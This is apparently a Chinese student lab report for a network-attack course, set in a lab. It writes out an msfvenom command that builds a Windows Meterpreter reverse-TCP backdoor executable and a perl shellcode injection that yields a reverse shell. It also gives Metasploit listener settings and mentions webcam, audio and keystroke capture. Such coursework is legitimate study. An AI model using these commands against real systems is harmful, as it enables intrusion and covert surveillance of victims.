[关闭]
@Half-Bread 2020-03-20T07:37:57.000000Z 字数 2648 阅读 182

EXP2

网络对抗


使用netcat获取主机操作Shell,cron启动

使用socat获取主机操作Shell, 任务计划启动

使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  1. msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b 'x00x0axff' LHOST=192.168.0.105 LPORT=4317 -f exe > zy20174317_backdoor.exe

生成带有后门的可执行文件,其中-p表示使用的payload。这里windows/meterpreter/reverse_tcp就是一段shellcode,表示windows反向连接kali。-e指定编码器,-b表示shellcode中不要出现以下字符,由于这里使用的是反向连接,所以LHOST需要时设置为Kali的IP。

使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

最开始提权是失败了的,后来参考这篇博客,提权成功。

2.5. 可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell,加分内容一并写入本实验报告。

  1. perl -e 'print "A" x 32; print "\x50\xd3\xff\xff\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00\x01\x68\x02\x00\x10\xdd\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"' > 20174317_shellcode
  1. use exploit/multi/handler
  2. set payload linux/x86/shell_reverse_tcp //生成shellcode时使用的playload
  3. set LHOST 127.0.0.1
  4. set LPORT 4317
  5. exploit //设置完成,开始侦听

遇到无法执行文件的问题

在Windows中运行可执行文件时出错,检查后发现是权限不足,查看文件属性,在安全选项卡中,选择编辑,将Everyone的权限设置为完全控制,然后点击高级,将权限条目中的第一行删除。

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注